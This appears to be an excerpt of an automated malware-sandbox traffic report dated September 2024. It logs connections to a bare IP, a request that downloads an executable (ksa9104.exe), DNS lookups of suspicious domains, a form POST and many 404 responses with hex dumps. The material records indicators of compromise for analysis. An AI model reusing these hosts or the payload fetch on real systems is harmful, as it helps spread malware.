                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
                Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://nmesrodehsvre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:02:20 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:02:28 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:02:29 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:02:36 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:03:53 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:04:14 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:04:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 14:04:59 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
